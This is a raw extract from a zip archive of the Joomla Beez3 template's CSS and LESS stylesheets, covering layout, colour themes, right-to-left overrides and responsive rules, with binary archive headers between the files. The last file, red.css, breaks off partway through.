 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
 */



#all { width: expression(document . body . clientWidth > 1050 ? "1050" : "auto");  }
#footer-inner { width: expression(document . body . clientWidth > 1050 ? "1025" : "auto");  }
#footer { width: expression(document . body . clientWidth > 1050 ? "1020" : "auto");  }

#all
{
        border:solid 1px #fff;
                zoom:1
}

#header
{ position:relative; zoom:1}


#line
{
        width:19.0em;
        margin-right:20px;

}


#header ul.skiplinks li a
{

background:#cc0000;
border:0px solid #000

}


#contentarea,
#contentarea2
{
       display:inline-block;
        position:relative;
}

#main
{
            height:520px;
}

#back
{
        margin: 0;
        padding:0 0px;
}

#right
{
        float:left;
        width: 20.5%;
        text-align:left !important
}

.left
{
            margin:10px 0px 10px 18px;

}

/* haslayout erzwingen */

.blog
{
            width:100%
}

.article_row
{
        width:auto;
}

.row1 .cols2
{
        width:auto;
}

.moduletable,
.moduletable_js
{
            zoom:1
}

#nav ul li,
#right ul li,
#bottom ul li
{
            height:1%
}

p.articleinfo
{
            display:inline-block
}

h1
{

}

ul.tabs
{
        text-align:left
}

ul.newsflash-horiz,
#footer-outer,
ul.tabs
{
        zoom:1
}

.tabcontent
{
        overflow:hidden !important;
        position:relative
}

#main h1
{ zoom:1}

.box {width:26%}

#bottom
{display:inline-block}

.panel,
div.current
{zoom:1}

.contact-image
{
	display:inline-block
}
.item-page
{ width:100%}

#mailto-window  .mailto-close a
{

	width:25px;
	height:25px;



}

#users-profile-core legend,
#users-profile-custom legend,
.profile-edit legend,
.registration legend
{
	margin-bottom:15px
}


.login-fields input
{
	width:14em
}

dd.error
{zoom:1}

#close a
{
	cursor:pointer
}

#close a span
{
	line-height:normal
}
PK՜�\y��--beez3/css/turq.lessnu�[���@basecolor 		: rgb(45,53,62);
@compcolor 		: spin(@basecolor, 180);
@bordercolor    : lighten(@basecolor, 60%);
@bodycolor : #eeeeee;
@contentbackground:#fff;
@textcolor : #555;
@linkcolor 		    : #009999;
@linkcolorhover 	: darken(@linkcolor, 10);
@linkcolorvisited   : darken(@linkcolorhover, 10);
@linkcolorfocus 	: darken(@linkcolorvisited, 10);
@backgroundlogoheader: #009999;
@headermenugradientfrom:#eee;
@headermenugradientto:#ddd;
@uxelmentsgradientfrom: #ffffff;
@uxelmentsgradientto: #dddddd;
@uxelmentshovergradientfrom: #00B9B9;
@uxelmentshovergradientto: #009999;

body {
	background: @bodycolor
}

h3 {
	color: @textcolor
}

h2 a {
	text-decoration: none
}

h2,.moduletable h3, .items-leading h2 {
	border-bottom: solid 1px #ddd;
}

.items-row h2 {
	border-top: solid 1px #ddd;
	border-bottom: solid 1px #ddd;
}

a:link,a:visited {
	color: @linkcolor
}

a:hover,a:active,a:focus {
	background:@linkcolor 	 ;
	color: #FFF;
}

.logoheader {
	background: @backgroundlogoheader;
	color: #FFFFFF;
	min-height: 200px;
}

#all {
	background: @contentbackground;
	color: @textcolor ;
}

#shadow #all {
	box-shadow: 0px 20px 10px #555555
}

#header ul.menu {
  background-color:#ddd;
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=@headermenugradientfrom, endColorstr=@headermenugradientto);
  background-image: -khtml-gradient(linear, left top, left bottom, from(@headermenugradientfrom), to(@headermenugradientto));
  background-image: -moz-linear-gradient(top, @headermenugradientfrom, @headermenugradientto);
  background-image: -ms-linear-gradient(top, @headermenugradientfrom, @headermenugradientto);
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, @headermenugradientfrom), color-stop(100%, @headermenugradientto));
  background-image: -webkit-linear-gradient(top, @headermenugradientfrom, @headermenugradientto);
  background-image: -o-linear-gradient(top, @headermenugradientfrom, @headermenugradientto);
  background-image: linear-gradient(@headermenugradientfrom, @headermenugradientto);
  border-color: #b2b2b2 #b2b2b2 hsl(114, 0%, 62.5%);

  text-shadow: 0 1px 1px rgba(255, 255, 255, 0.49);
  -webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px
		rgba(0, 0, 0, 0.05);
	border: solid 1px #ddd;
	border: 1px solid #e5e5e5;
	text-transform: uppercase;
}

#header ul.menu a:link,#header ul.menu a:visited {
	color: #333;
	font-weight: bold;
	text-decoration: none;
	padding: 0px 10px;
	margin: 0;
	display: inline-block;
	margin: 0 0 0;
	padding: 12px 15px;
	position: relative;
	border-right: 1px solid #ddd;
	box-shadow: 1px 0px 0px #f5f5f5;
}

/*  grey background */
.button,button,p.readmore a,#header input.button,.pagenav a:link,.pagenav a:visited,#advanced-search-toggle,.profile-edit a:link,.profile-edit a:visited,h3.js_heading,.article-info
	{
  background-color:#ddd;
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=@uxelmentsgradientfrom, endColorstr=@uxelmentsgradientto);
  background-image: -khtml-gradient(linear, left top, left bottom, from(@uxelmentsgradientfrom), to(@uxelmentsgradientto));
  background-image: -moz-linear-gradient(top, @uxelmentsgradientfrom, @uxelmentsgradientto);
  background-image: -ms-linear-gradient(top, #ffffff, #dddddd);
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, @uxelmentsgradientfrom), color-stop(100%, @uxelmentsgradientto));
  background-image: -webkit-linear-gradient(top, @uxelmentsgradientfrom, @uxelmentsgradientto);
  background-image: -o-linear-gradient(top, @uxelmentsgradientfrom, @uxelmentsgradientto);
  background-image: linear-gradient(@uxelmentsgradientfrom, @uxelmentsgradientto);
  border-color: #b2b2b2 #b2b2b2 hsl(114, 0%, 62.5%);

  text-shadow: 0 1px 1px rgba(255, 255, 255, 0.49);
  -webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px
		rgba(0, 0, 0, 0.05);
	color: @linkcolor;
	border: solid 1px #ddd
}
.article-info
{color:@textcolor}
/* +++++++++++++  table display  Categories table, contact etc, ++++++++++++++++++++* */
table {
	border: solid 1px #ddd
}



table th a:link,table th a:visited {
	color: #fff
}

tr.odd,tr.cat-list-row1 {
	background: #f8f8f8
}

table  tr:hover td {
	background: #FEFDE2;
}

/* blue background */
.button:hover,
.button:active,
.button:focus,
button:hover,
p.readmore a:hover,
#header ul.menu a:hover,
#header ul.menu a:active,
#header ul.menu a:focus,
.pagenav a:hover,
.pagenav a:active,
.pagenav a:focus,
#advanced-search-toggle:hover,
#advanced-search-toggle:active,
#advanced-search-toggle:focus,
.profile-edit a:hover,
.profile-edit a:active,
.profile-edit a:focus,
#fontsize a:hover,#fontsize a:active,#fontsize a:focus,
#mobile_select h2 a,table th,.logoheader
	{

  background-color:@uxelmentshovergradientfrom;
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=@uxelmentshovergradientfrom, endColorstr=@uxelmentshovergradientto);
  background-image: -khtml-gradient(linear, left top, left bottom, from(@uxelmentshovergradientfrom), to(@uxelmentshovergradientto));
  background-image: -moz-linear-gradient(top,@uxelmentshovergradientfrom, @uxelmentshovergradientto);
  background-image: -ms-linear-gradient(top, @uxelmentshovergradientfrom, @uxelmentshovergradientto);
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, @uxelmentshovergradientfrom), color-stop(100%, @uxelmentshovergradientto));
  background-image: -webkit-linear-gradient(top, @uxelmentshovergradientfrom, @uxelmentshovergradientto);
  background-image: -o-linear-gradient(top, @uxelmentshovergradientfrom, @uxelmentshovergradientto);
  background-image: linear-gradient(@uxelmentshovergradientfrom, @uxelmentshovergradientto);
  border-color: @uxelmentshovergradientto;
  color: #fff ;
  text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.33);
  -webkit-font-smoothing: antialiased;



}
input:focus,textarea:focus {
	box-shadow: 0 1px 1px  @headermenugradientto inset, 0 0 8px @uxelmentshovergradientfrom;
	outline: 0 none;
}
/* +++++++++++++++++  Pagination +++++++++++++++ */
.pagination span,.pagination span  a:hover {
	color: #999999;
	background-color: #f5f5f5;
}

/* active item */

span.pagenav {
	background: @uxelmentshovergradientto;
	color: #fff;
}

.pagination-start span.pagenav,.pagination-prev  span.pagenav,.pagination-end span.pagenav,.pagination-next span.pagenav
	{
	background-color: #f5f5f5;
	color: #444;
}

/* +++++++++++++++++  content  +++++++++++++++ */


ul.menu a:link,ul.menu a:visited {
	color: #444;
}

/* ++++++++++++++++++++++  menu ++++++++++++++++++++++++++  */
.moduletable_menu {
	border: solid 1px #ddd;
	background: #f9f9f9;
}

#header ul.menu {
	border: solid 1px #D5D5D5;
	box-shadow: 0 1px 0 #FFFFFF inset, 0 1px 5px rgba(0, 0, 0, 0.1);
}

#header ul.menu a {
	box-shadow: none;
	border-bottom: 0
}

ul.menu a:hover,ul.menu a:active,ul.menu a:focus {
	background-color: #F5F5F5;
	background-image: -moz-linear-gradient(center top, #FFFFFF, #E6E6E6);
	background-repeat: repeat-x;
  background: url(../images/arrow.png) no-repeat right center;
  color:@linkcolor
}

/* ++++++++++++++++   highlighting active menuitem  +++++++++++++++++++ */
ul.menu li.active a,ul.menu  li.active ul li.active a,ul.menu  li.active ul li.active  ul li.active a,ul.menu  li.active ul li.active  ul li.active ul li.active  a,ul.menu  li.active ul li.active  ul li.active ul li.active ul li.active a
	{
	font-weight: bold;
}

ul.menu  li.active ul li a,ul.menu  li.active ul li.active  ul li a,ul.menu  li.active ul li.active  ul li.active ul li  a,ul.menu  li.active ul li.active  ul li.active ul li.active ul li a
	{
	font-weight: normal
}

ul.menu a {
	box-shadow: 0 1px 0 #fff;
	border-bottom: solid 1px #ddd;
	text-shadow: 0 1px 0 #fff
}

ul.menu ul a {
	background: #e5e5e5;
	margin-bottom: 1px
}

ul.menu ul ul ul a {
  background: #f5f5f5 url(../images/arrow.png) no-repeat 24px center;
}

ul.menu ul ul ul ul a {
	background: #fff;
}

/* +++++++++++++++++++++++  SLIDER  ++++++++++++++++++++  */
.panel h3.pane-toggler a {
	background: url(../images/slider_plus.png) right top no-repeat;
	color: #333
}

.panel h3.pane-toggler-down a {
	background: url(../images/slider_minus.png) right top no-repeat;
	border-bottom: solid 1px #ddd;
	color: #333
}

/*  +++++++++++++++++   Tabs ++++++++++++++++++++++  */
ul.tabs li,dl.tabs dt h3 a:link,dl.tabs dt h3 a:visited {
	background: #f5f5f5 url(../images/nature/box.png) repeat-x;
}

ul.tabs li a:link,ul.tabs li a:visited,dl.tabs dt a {
	color: #333;
	border: solid 1px #ddd;
	border-bottom: 0
}

ul.tabs li a:hover,ul.tabs li a:active,ul.tabs li a:focus {
	color: #000
}

.tabcontent,div.current {
	background: #fff;
	color: #000;
	border: solid 1px #ddd;
}

.tabcontent .linkclosed {
	color: #000;
	border-bottom: solid 1px #e5e5e5;
}

ul.tabs li a.linkopen,dl.tabs dt.open  h3 a:link,dl.tabs dt.open  h3 a:visited
	{
	background: #fff;
	color: #333;
	border-radius: 5px 5px 0px 0px;
}

ul.tabs li a.linkclosed:hover,ul.tabs li a.linkclosed:active,ul.tabs li a.linkclosed:focus,ul.tabs li a.linkopen:hover,ul.tabs li a.linkopen:active,ul.tabs li a.linkopen:focus
	{
	background: #555;
	color: #fff
}

#footer-inner,#footer {
	background: #f5f5f5;
	box-shadow: 0px 20px 10px #555
}

#footer {
	background: #555;
	max-width: 1025px;
	margin: 0 auto;
	box-shadow: 0px 0px 10px #555555;
	color: #fff
}

#footer a {
	color: #fff;
	background: none
}

#bottom a {
	background: none
}

.box1 {
	border-right: solid 1px #ccc
}

.box3 {
	border-left: solid 1px #ccc
}

#bottom  ul li a {
	background-image: none;
	padding-left: 0
}

/* responsive */
#mobile_select h2 {border:0; margin:-17px 0 0 0; padding:0; background:@uxelmentshovergradientto;text-align:right}
#mobile_select h2 a {
display:inline-block;
font-size:0.8em;
border-radius:4px 4px 0 0;
padding:6px;
font-size:0.75em;
margin-right:5px;
}

@media only screen and (max-width: 480px) {

	img {
  max-width: 100%;
  height: auto;
  border: 0;
  -ms-interpolation-mode: bicubic;
}

	#fontsize{display:none}
	#nav,#wrapper2,#wrapper,.cols-3 .column-1,.cols-3 .column-2,.cols-3 .column-3,#right,.box,#header form
		{
		float: none;
		width: 100%
	}
	#header {padding-top:3em}
	#header form  {margin:0}
	.logoheader {background:@uxelmentshovergradientto; min-height:100px; margin:0}
	.box {
		border-left: 0 !important;
		border-bottom: solid 1px #ddd;
	}
	#line {
		text-align: center;
		top: 0;
		right: auto;
		max-width: 100% ;
		min-width:100%;

		margin: 0 0px; background:@uxelmentshovergradientfrom;
	}
	#header form input {
		float: none; margin-bottom:4px
	}
	#menuwrapper { margin-top:10px; }
	#header ul.menu {position:relative; top:0;left:20px; right:20px; margin:0; width:90%; border-radius:4px}
	#header ul.menu li:first-child a {border-radius: 4px 4px 0 0}
	#header ul.menu li:last-child a {border-radius:0 0 4px 4px }
	#header ul.menu li a:link,

	#header ul.menu li a:visited {
		display: block;
		padding: 6px 10px;
		border-bottom: solid 1px #ccc
	}
}

@media only screen and (min-width: 600px) {
}

@media only screen and (min-width: 768px) {
}

@media only screen and (min-width: 992px) {
}

@media only screen and (min-width: 1382px) { /* Styles */
}

@media only screen and (-webkit-min-device-pixel-ratio: 1.5) , only screen and
		(min--moz-device-pixel-ratio: 1.5) , only screen and
	(min-device-pixel-ratio: 1.5) { /* Styles */
}
PK՜�\���"�"beez3/css/template_rtl.cssnu�[���/**
 * @author Design & Accessible Team ( Angie Radtke  )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright (C) 2010 Open Source Matters, Inc. <https://www.joomla.org>
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
 */


 #all
{
	text-align: right;
}

#wrapper
{
	float:right;
}


#logo span
{
	padding-right:15px;}


h1#logo{
	font-family: 'Titillium Maps',  Arial;
	padding:0.9em 20px 20px 10px;
	/*text-transform:uppercase;*/
	text-align:right;
}

#logo
{
	margin-top:0.6em;
	margin-left:10px;
	/* position:absolute;*/
	display:block;
	padding:20px 20px 20px 10px;
	width:425px;
	padding-top:0.6em;
	font-weight:normal;
	line-height:1em;
	font-size:3em;
}

.logoheader
{
	text-align:right;
}

/* ##########################  header  ########################### */

#header
{
	font-size:1em;
	position:relative
}

#header ul.menu {
	text-align: right;
}

/* ++++++++++++++  search box+font options ++++++++++++++ */
#line {
	left: 20px;
	margin-right: -10px;
	right: auto;
	text-align: left;
}

/* ++++++++++++++  breadcrumbs   ++++++++++++++ */

#breadcrumbs {
	/*display: block;*/
	background: none;
	float: right;
	text-align: right;
	width: 100%;
}

#breadcrumbs *
{
	text-align:right;
	float: right;

}
/* for IE7 and less */
*:first-child+html .breadcrumbs, * html .breadcrumbs {
	width: 100%;
}
#breadcrumbs
{
	margin:15px 5px 15px 0px;
}
#breadcrumbs img
{
	padding: 4px 5px 0px 5px;
}

#breadcrumbs .showHere {
	margin-left: 4px;
}
ul.menu li a:link,ul.menu li a:visited {
	background: url(../images/nature/karo.gif) no-repeat scroll right 14px;
	padding-right: 10px;
}

ul.menu li {
	text-align: right;
}

ul.menu li.active ul li a:link,
ul.menu li.active ul li a:visited
{
	padding-right: 20px;
}

ul.menu li.active ul li.active a:link,
ul.menu li.active ul li.active a:visited
{
	padding-right: 20px;
}

ul.menu li.active ul li.active ul li a:link,
ul.menu li.active ul li.active ul li a:visited
{
	padding-right: 33px;
}

ul.menu li.active  ul li.active  ul li.active  ul li  a:link,
ul.menu li.active  ul li.active  ul li.active  ul li a:visited
{
	padding: 3px 47px 3px 2px;
	background:#fff url(../images/nature/arrow_small_rtl.png) no-repeat scroll right 8px;
}

ul.menu li.active  ul li.active  ul li.active  ul li.active	ul li  a:link,
ul.menu li.active  ul li.active  ul li.active  ul li.active	ul li a:visited
{
	padding-right:30px;
}

h3 {
	text-align: right
}

h3.js_heading a {
	position: absolute;
	right: auto;
	left: 5px
}

.box {
	text-align: right
}

ul.newsfeed {
	text-align: right
}

a.readmore:link,a.readmore:visited,.readmore a:link,.readmore a:visited
	{
	background: url(../images/nature/arrow1_rtl.gif) repeat-x scroll right top;
	padding-right: 10px !important
}

.readmore a:hover, .readmore a:active, .readmore a:focus,
a.readmore a:hover, a.readmore a:active, a.readmore a:focus
{
	background: url(../images/nature/arrow2_rtl.gif) no-repeat right 6px #555 !important;
}

.mailto-close {
	left: 5px !important;
	right: auto !important;
}

* html .mailto-close {
	left: 0;
	position: absolute;
	right: 340px !important
}

/* personal.css overrides */

.panel h3.pane-toggler a
{
	background:#f5f5f5 url(../images/slider_plus_rtl.png) left top no-repeat;
}
.panel h3.pane-toggler-down a
{
	background:#f5f5f5  url(../images/slider_minus_rtl.png) left top no-repeat;
	border-bottom:solid 1px #ddd;
}

.form-required
{
	background-position: right;
}

input.button,
button.button
{
	background:#FFFFFF url(../images/nature/arrow1_rtl.gif) no-repeat right top;
}

/* layout.css overrides */

#main ul
{
	padding:0 15px 0 0;
	margin:10px 0 10px 0px;
}

#main ol
{
	padding:0 20px 0 0;
	margin:10px 0 10px 0px;
}

.contact-email label
{
	width:17em;
	float:right;
}

#contact-email-copy
{
	float:right;
	margin-left:10px;
}

table.weblinks th, table.category th {
	text-align: right;
}

table th, table td {
	text-align: right;
}

dl.tabs {
	float: right;
	margin: 50px 0 0 0;
	z-index: 50;
	clear:both;
}

dl.tabs dt {
	float: right;
	padding: 4px 10px;
	border-left: 1px solid #ccc;
	border-right: 1px solid #ccc;
	border-top: 1px solid #ccc;
	margin-left: 3px;
	margin-right: 0px;
}

form fieldset dt
{
	clear:right ;
	float:right;
	width:12em;
	padding:3px 0
}

form fieldset dd
{
	float:right;
	padding:3px 0
}

#users-profile-core dt,
#users-profile-custom dt
{
	float:right;
	width:12em;
	padding:3px 0;


}

.profile-edit form#member-profile fieldset dt,
.registration form#member-registration fieldset dt
{padding:5px 0px 5px 5px; width:13em}


.login-fields label
{float:right}

/* ++++++++++++++  pagination  ++++++++++++++ */

#main .pagination
{
	float:right;
	text-align:right;
	padding:10px 10px 0px 0px;
	width: 100%;
	clear:both;
}

#main .pagination ul
{
	float:right;
	text-align:right;

}

#main .pagination li
{
	float:right;
	text-align:right;
}

#main .pagination li.pagination-start span,
#main .pagination li.pagination-start a
{
padding:4px 0;
}

.left1 {
	float: right;
	margin: 10px 10px 3% 10px ;
}


/* ++++++++++++++  login  ++++++++++++++ */



#login-form label
{
	margin-right:0px;
}

#form-login-remember label
{
	float:none;
	width:auto;
	display:inline
}

input.button,
button.button,
button.validate
{
	padding:3px 7px 5px 7px;
}

#modlgn-username,
#modlgn-passwd
{
	margin-right: 0;
}

.module_content #form-login-username label,
.module_content #form-login-password label
{
	float:right;

}

.login-fields
{
	margin:10px 0
}

.login-fields label
{
	float:right;
}

.login-description img,
.logout-description img
{
	float:right;
	margin-right:0px
}

.login-description,
.logout-description
{
	padding-right:5px;
	margin:20px 10px 0 0;
}

/* ++++++++++++++  columns alignment left to right  ++++++++++++++ */
ul.tabs li {
	float: right;
	border-left: 1px solid #DDDDDD;
	border-right: 0px solid #DDDDDD;
}


ul.pagenav li.pagenav-next {
	float: left;
}
ul.pagenav li.pagenav-prev {
	float: right;
}
#close span {
	width: auto;
	left: 20px;
	right: auto;
}
#header ul.menu li a:link,
#header ul.menu li a:visited
{
	border-right:solid 0px #237D85;
	border-left:solid 1px #237D85;
}

#header ul li.active a:link,
#header ul li.active a:visited
{
	border-right:solid 0px #237D85;
	border-left:solid 1px #237D85;
}
#fontsize {
	margin: 0 1px 0 20px;
	text-align: right;
}
#fontsize p a:link, #fontsize p a:visited {
	border-left: 1px solid #CCCCCC;
	border-right: none;
}
#header form .inputbox {
	margin: 2px 2px 2px 13px;
}
#header form .inputbox:focus { margin: 1px 1px 0 11px; }
#header ul.menu li {
	float: right;
}

/* ############## Blog/featured columns ######## */

.blog-featured .item, .blog .item {
	float:right;
}
.items-row .column-1 {
	margin-right: 0;
	margin-left: 4%;
}

#main ul.actions {
	text-align: left;
}

.content_rating {
	text-align: right;

}

ul.menu li ul li ul li ul li ul {
	padding-right: 7px;
}

#system-message dd.notice ul,
#system-message dd.error ul,
#system-message dd.message  ul {
        background-position: 100% 0!important;
        padding: 10px 40px 10px 10px!important;
}
#system-message dd.message  ul {
        background-image:url(../images/system/notice-info_rtl.png)!important;
}
#system-message dd.notice ul {
        background-image:url("../images/system/notice-note_rtl.png")!important;
}
#system-message dd.error ul {
        background-image:url(../images/system/notice-alert_rtl.png)!important;
}

/* ++++++++++++++  image float style ++++++++++++++ */
.img-fulltext-left {
	float: right;
	margin-left: 20px;
	margin-bottom: 20px;
}

.img-intro-left {
	float: right;
	margin-left: 10px;
	margin-bottom: 10px;
}

.img-fulltext-right {
	float:left;
	margin-right: 20px;
	margin-bottom: 20px;
}

.img-intro-right {
	float: left;
	margin-right: 10px;
	margin-bottom: 10px;
}

/* ++++++ Bootstrap markup ++++++++++++++ */
.pull-left {
	float: right;
}

/* ++++++ tooltip  +++++++ */
.tooltip.right {
	margin-left: -3px;
}
.tooltip.left {
	margin-left: 3px;
}
.popover,
.tooltip-inner {
	text-align: right;
}
.tooltip.top .tooltip-arrow {
	bottom: 0;
	right: 50%;
	margin-right: -5px;
}
.tooltip.right .tooltip-arrow {
	left: 0;
	border-width: 5px 0 5px 5px;
}
.tooltip.left .tooltip-arrow {
	right: 0;
	border-width: 5px 5px 5px 0;
}
.tooltip.bottom .tooltip-arrow {
	right: 50%;
	margin-right: -5px;
}

/* Smartsearch Calendar*/
#filter_date1_img,
#filter_date2_img {
	margin-left: 0;
	margin-right: 3px;
}
ul#finder-filter-select-dates li.filter-date {
	text-align: right;
}
.radio, .checkbox {
	padding-left: 0;
	padding-right: 4px;
}
#searchForm .searchintro {
	padding: 0 250px 0 0;
}PK՜�\���00beez3/css/position.cssnu�[���/**

 * @author ( Angie Radtke )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
 */

html,
body,
body div,
span,
object,
iframe,
h1,
h2,
h3,
h4,
h5,
h6,
p,
blockquote,
pre,
abbr,
address,
cite,
code,
del,
dfn,
em,
img,
ins,
kbd,
q,
samp,
small,
strong,
sub,
sup,
var,
b,
i,
dl,
dt,
dd,
ol,
ul,
li,
fieldset,
form,
label,
legend,
table,
caption,
tbody,
tfoot,
thead,
tr,
th,
td,
article,
aside,
figure,
footer,
header,
hgroup,
menu,
nav,
section,
time,
mark,
audio,
video {
    margin: 0;
    padding: 0;
    border: 0;
    outline: 0;
    vertical-align: baseline;
    background: transparent;
}

article,
aside,
figure,
footer,
header,
hgroup,
nav,
section {
    display: block;
}

html {
    background: #ffffff;
    font-size: 100.01%;
    -webkit-overflow-scrolling: touch;
    -webkit-tap-highlight-color: #f3f5f6;
    -webkit-text-size-adjust: 100%;
    -ms-text-size-adjust: 100%;
}

body {

    position: relative;
    width: 100%;
    line-height: 1.5em;
    background: #eee
}

/* ###################### general ###################### */
#all {
    margin: 0 auto;
    max-width: 1050px;
    padding: 0;
    text-align: left;
    font-size: 0.8em
}

#header {
    display: block !important;
    position: relative;
    padding: 8em 0 0 0;
    overflow: hidden;
}

#header ul {
    position: absolute;
    left: 0;
    top: 5em;
    right: 0;
    display: block;
    margin: 0 0 1px 0;
    text-align: right;
    list-style-type: none;
    padding: 10px 0
}

#back {
    margin: 0;
    padding: 0;
}

#contentarea,
#contentarea2 {
    position: relative;
    overflow: hidden;
    padding: 0 20px !important;
    margin: 0;

}

#wrapper {
    width: 53%;
    float: left;
    position: relative;

}

#wrapper2 {
    width: 72%;
    float: left;
    position: relative;
    padding-bottom: 20px;

}

#wrapper2 .item-page {
    max-width: 660px
}

#main {
    padding-top: 10px;
    padding-bottom: 20px;
    position: relative;

}

#right {
    float: left;
    width: 20%;
    margin: 10px 0 10px 2%;
    padding: 0 0 5px 0;
    position: relative;
}

.unseen,
.hidelabeltxt,
#line label {
    display: inline;
    height: 0;
    left: -3000px;
    position: absolute;
    top: -2000px;
    width: 0;
}

/* ++++++++++++++  nav after content  ++++++++++++++ */
.left {
    padding-top: 0;
    float: right;
    margin: 10px 0 10px 0;
    width: 22%;
    position: relative;

}

/* ++++++++++++++  nav before content  ++++++++++++++ */
.left1 {
    padding: 0;
    float: left;
    margin: 10px 3% 10px 0;
    width: 21%;
    position: relative
}

.leftbigger {
    width: 25%
}

/* ###################### header ###################### */

.skiplinks,
.skiplinks li {
    display: inline;
    height: 0;
    line-height: 0;
    padding: 0 !important;
}

.skiplinks li a.u2 {
    display: inline;
    height: 0;
    left: -3000px;
    position: absolute;
    top: -2000px;
    width: 0;

}

.skiplinks li a.u2:active,
.skiplinks li a.u2:focus {
    position: absolute;
    width: 13em;
    top: -4em;
    left: 10px;
    line-height: 1.5em;
    padding: 5px;
    font-weight: bold;
    height: 3em;

}

.wrap {
    border: 0;
    clear: both;
    float: none;
    font-size: 1px;
    height: 0;
    line-height: 1px;
    margin: 0;
    padding: 0;
    visibility: hidden;
}

#logo {
    margin-top: 0;
    margin-left: 10px;
    display: block;
    padding: 1em 20px 20px 10px;
    width: 425px;
    font-weight: normal;
    line-height: 1em;

}

#logo img {
    display: block;
}

#logo span {
    padding-left: 2px
}

#logo span.header1 {
    display: block;
    top: 0;
    line-height: 0.8em;
    font-size: 0.7em;
    padding-left: 55px
}

.logoheader {
    margin: -2px 10px 0;
    padding: 0;
    text-align: left;
    font-weight: normal;
    line-height: 1.5em;
}
.header1 {
	font-size: 1.5em;
	margin-left: 10px;
}

#line {
    padding: 5px 0 2px 2px;
    position: absolute;
    right: 10px;
    top: 0.5em;
    max-width: 40em;
    text-align: right;
    min-width: 40em

}

#fontsize,
#line .search {
    display: inline;
    margin: 0;
}

/* ++++++++++++++  button for closing right column  ++++++++++++++ */

#close {
    margin-right: 0;
    text-transform: uppercase;
}

#close span {
    position: absolute;
    right: 20px;
    z-index: 10000;
    top: 5px;
    font-weight: bold;
    text-align: right;
    line-height: 1.5em;
    margin-top:20px;
    padding: 5px
}

#close > a {
    display: block;
    overflow: hidden
}

#close > a:hover span {
    background: #095197
}

/* ###################### main ###################### */

/* ++++++++++++++  position  ++++++++++++++ */

.blog-featured {
    padding: 0;
}

.items-leading {
    padding: 0 5px 10px 5px;
    overflow: hidden;
    margin-bottom: 10px
}

.row-separator {
    display: block;
    clear: both;
    margin: 0;
    border: 0;
    height: 1px
}

.item-separator {
    display: none;
    margin: 0;
}

.shownocolumns {
    width: 98% !important;
}

#top {
    margin: 0 0 20px 0;
    overflow: hidden
}

/* ++++++++++++++  blog  ++++++++++++++ */

.cols-1 {
    display: block;
    float: none !important;
    margin: 0 !important;
}

.cols-2 .column-1 {
    width: 46%;
    float: left;
}

.cols-2 .column-2 {
    width: 46%;
    float: right;
    margin: 0
}

.cols-3 .column-1 {
    float: left;
    width: 29%;
    padding: 0 5px;
    margin-right: 4%

}

.cols-3 .column-2 {
    float: left;
    width: 29%;
    margin-left: 0;
    padding: 0 5px
}

.cols-3 .column-3 {
    float: right;
    width: 29%;
    padding: 0 5px
}

.items-row {
    overflow: hidden;
    margin-bottom: 10px !important;
}

.column-1,
.column-2,
.column-3 {
    padding: 10px 5px
}

.column-2 {
    width: 55%;
    margin-left: 40%;
}

.column-3 {
    width: 30%
}

.blog-more {
    padding: 10px 5px
}

/* ++++++++++++++  footer  ++++++++++++++ */

#bottom {
    overflow: hidden
}

.box {
    width: 27%;
    float: left;
    margin-right: 10px;
    min-height: 100px
}

.box1 {
    width: 35%
}

.box2 {
    width: 32%
}

.box3 {
    float: right
}

#footer-inner, #footer {
    max-width: 1025px;
    margin: 0 auto;

    padding: 10px 15px 10px 10px;
}

img {
    border: 0 none;
    max-width: 100%;
}

/* hide the mobile menu button */
#mobile_select {
    display: none
}
PK՜�\�E��"�"beez3/css/red.cssnu�[���/* This beautiful CSS-File has been crafted with LESS (lesscss.org) and compiled by simpLESS (wearekiss.com/simpless) */
body {
	background: #eee
}

h3 {
	color: #555
}

h2 a {
	text-decoration: none
}

h2, .moduletable h3, .items-leading h2 {
	border-bottom: solid 1px #ddd
}

.items-row h2 {
	border-top: solid 1px #ddd;
	border-bottom: solid 1px #ddd
}

a:link, a:visited {
	color: #c00
}

a:hover, a:active, a:focus {
	background: #c00;
	color: #FFF
}

.logoheader {
	background: #900;
	color: #FFF;
	min-height: 200px
}

#all {
	background: #fff;
	color: #555
}

#shadow #all {
	box-shadow: 0 20px 10px #555
}

#header ul.menu {
	background-color: #ddd;
	background-repeat: repeat-x;
	filter: progid:dximagetransform.microsoft.gradient(startColorstr=#eeeeee, endColorstr=#dddddd);
	background-image: -khtml-gradient(linear, left top, left bottom, from(#eee), to(#ddd));
	background-image: -moz-linear-gradient(top, #eee, #ddd);
	background-image: -ms-linear-gradient(top, #eee, #ddd);
	background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #eee), color-stop(100%, #ddd));
	background-image: -webkit-linear-gradient(top, #eee, #ddd);
	background-image: -o-linear-gradient(top, #eee, #ddd);
	background-image: linear-gradient(#eee, #ddd);
	border-color: #b2b2b2 #b2b2b2 #9f9f9f;
	text-shadow: 0 1px 1px rgba(255, 255, 255, .49);
	-webkit-font-smoothing: antialiased;
